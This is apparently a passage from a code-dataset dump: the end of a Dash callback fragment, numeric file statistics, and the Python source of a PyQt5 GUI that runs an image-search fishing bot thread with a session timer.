"value"), [ Input( self.id("rotation_angle", is_kwarg=True, hint="literal"), "options" ) ], ) def update_default_value(options): if not options: raise PreventUpdate return options[0]["value"]
34.670886
121
0.562705
1,179
10,956
5.049194
0.248516
0.060474
0.018814
0.022846
0.282043
0.219217
0.188812
0.178901
0.178901
0.162439
0
0.007671
0.345564
10,956
315
122
34.780952
0.822594
0.049379
0
0.205323
0
0
0.217918
0.002019
0
0
0
0.003175
0
1
0.038023
false
0
0.030418
0.011407
0.110266
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8209433689df2d1a57e76c64f9c9052b8c8371b0
2,871
py
Python
main.py
marcomaiermm/fishit
5c4992d91365ec9b841eaaa81848d4ad8a9af9ed
[ "MIT" ]
null
null
null
main.py
marcomaiermm/fishit
5c4992d91365ec9b841eaaa81848d4ad8a9af9ed
[ "MIT" ]
1
2021-06-08T21:07:25.000Z
2021-06-08T21:07:25.000Z
main.py
marcomaiermm/fishit
5c4992d91365ec9b841eaaa81848d4ad8a9af9ed
[ "MIT" ]
null
null
null
import imagesearch import gui import subprocess import time #from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtGui import * from PyQt5.QtWidgets import * from PyQt5.QtCore import * import traceback,sys class Thread(QThread): def __init__(self, fn, f=False): super(Thread, self).__init__() signal = pyqtSignal(object) self.f=f self.fn=fn # run method gets called when we start the thread def run(self): print("starting thread") if self.f: result = self.fn(w).CheckArea() else: result = self.fn() #w.gui.catched_edit.setText(str(process.fish_count)) #w.gui.status_edit.setText(str(process.status)) def stop(self): print("thread ended") self.terminate() class Timer: def __init__(self,duration): super(Timer, self).__init__() self.dur = duration self.elapsed_s = 0 self.elapsed_m = 0 self.elapsed_h = 0 self.total=0 def timer(self): while (self.total<=(self.dur*60)) and (w.gui.stoppedLabel.text()==""): if self.elapsed_m<=59: if self.elapsed_s<=59: self.elapsed_s+=1 else: self.elapsed_s=0 self.elapsed_m+=1 else: self.elapsed_h+=1 self.elapsed_m=0 time_text=str(self.elapsed_h) + ":" + str(self.elapsed_m) + ":" + str(self.elapsed_s) w.gui.time_edit.setText(time_text) self.total+=1 time.sleep(1) w.gui.stoppedLabel.setText("Stopped") w.Clear() class AppWindow(QMainWindow): def __init__(self): super(AppWindow, self).__init__() self.gui = gui.Ui_Window() self.gui.setupUi(self) self.fish_thread = Thread(imagesearch.Fishit, f=True) self.gui.fish_button.clicked.connect(self.FishButton) #self.fish_thread.signal.connect(self.gui.status_label.setText) #self.fish_thread.signal.connect(self.finished) self.gui.stop_button.clicked.connect(self.Stop) def FishButton(self): duration = int(self.gui.duration.currentText()) self.gui.fish_button.setEnabled(False) self.gui.stoppedLabel.setText("") self.fish_thread.start() self.timer = Thread(Timer(duration).timer) self.timer.start() def Stop(self): self.gui.stoppedLabel.setText("Stopped") self.timer.stop() self.Clear() self.time=0 def Clear(self): self.gui.time_edit.setText("0:0:0") self.gui.catched_edit.setText("") self.gui.status_edit.setText("") self.gui.fish_button.setEnabled(True) if __name__ == "__main__": app=QApplication(sys.argv) w=AppWindow() w.show() app.exec_()
29.295918
97
0.593173
359
2,871
4.562674
0.259053
0.087302
0.03663
0.031136
0.101343
0.068376
0.030525
0
0
0
0
0.012148
0.283177
2,871
98
98
29.295918
0.783771
0.1031
0
0.089744
0
0
0.02179
0
0
0
0
0
0
1
0.115385
false
0
0.102564
0
0.25641
0.025641
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0